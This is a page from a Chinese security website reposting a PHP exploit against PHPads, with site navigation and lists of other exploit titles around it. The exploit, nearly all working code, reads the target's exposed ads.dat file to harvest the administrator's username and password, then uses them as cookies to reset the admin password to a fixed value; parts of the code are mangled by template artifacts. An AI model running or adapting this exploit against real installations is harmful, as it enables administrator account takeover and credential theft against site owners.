首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPads <= 213607 - Authentication Bypass / Password Change Exploit
来源:vfocus.net 作者:msallm 发布时间:2015-01-04  
<title> PHPads Authentication Bypass  Exploit </title>
<pre>
PHPads Authentication Bypass / Administrator Password Change Exploit
<form method="POST">
Target  : <br><input type="text" name="target" value="<? if(
___FCKpd___0
POST['target']) {echo
___FCKpd___0
POST['target']; }else{echo 'http://localhost:4545/phpads';} ?>" size="70" /><br /><input type="submit" name="submit" /> </form> <?php function catchya($string, $start, $end) { preg_match('/'.$start.'(.*)'.$end.'/', $string, $matches); return $matches[1]; } function login($target) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target."/ads.dat"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); $username = catchya($result, "user=", "\n"); $password = catchya($result, "pass=", "\n"); return array($username,$password); curl_close($ch); } function adminchange($target, $username, $password) { $post = array('save' => '1', 'newlogin' => $username, 'newpass' => "htlover"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$post); $result = curl_exec($ch); if(preg_match("/Code Generator/", $result)) { return "<br><br><font color=green>Success !! Password changed </font><br>username: ".$username." | password: htlover"; }else{ return "Something wrong <br>"; } curl_close($ch); } if (isset(
___FCKpd___0
POST['submit'])) { $target =
___FCKpd___0
POST['target']; //login($target, $username, $userid); $logins = login($target); echo "USERNAME :" . $logins[0]; // username echo "<br>PASSWORD :" . $logins[1]; // password echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]); } ?> </pre>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Liferay Portal 7.0.x <= 7.0.2
·i-FTP Schedule Buffer Overflow
·ProjectSend Arbitrary File Upl
·WordPress RevSlider Local File
·Desktop Linux Password Stealer
·Malicious Git And Mercurial HT
·Maxthon Browser Address Bar Sp
·ASUSWRT 3.0.0.4.376_1071 - LAN
·jetAudio 8.1.3.2200 Crash Proo
·SkinCrafter3_vs2005 ActiveX Ex
·WhatsApp <= 2.11.476 - Remote
·SkinCrafter3_vs2008 ActiveX Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved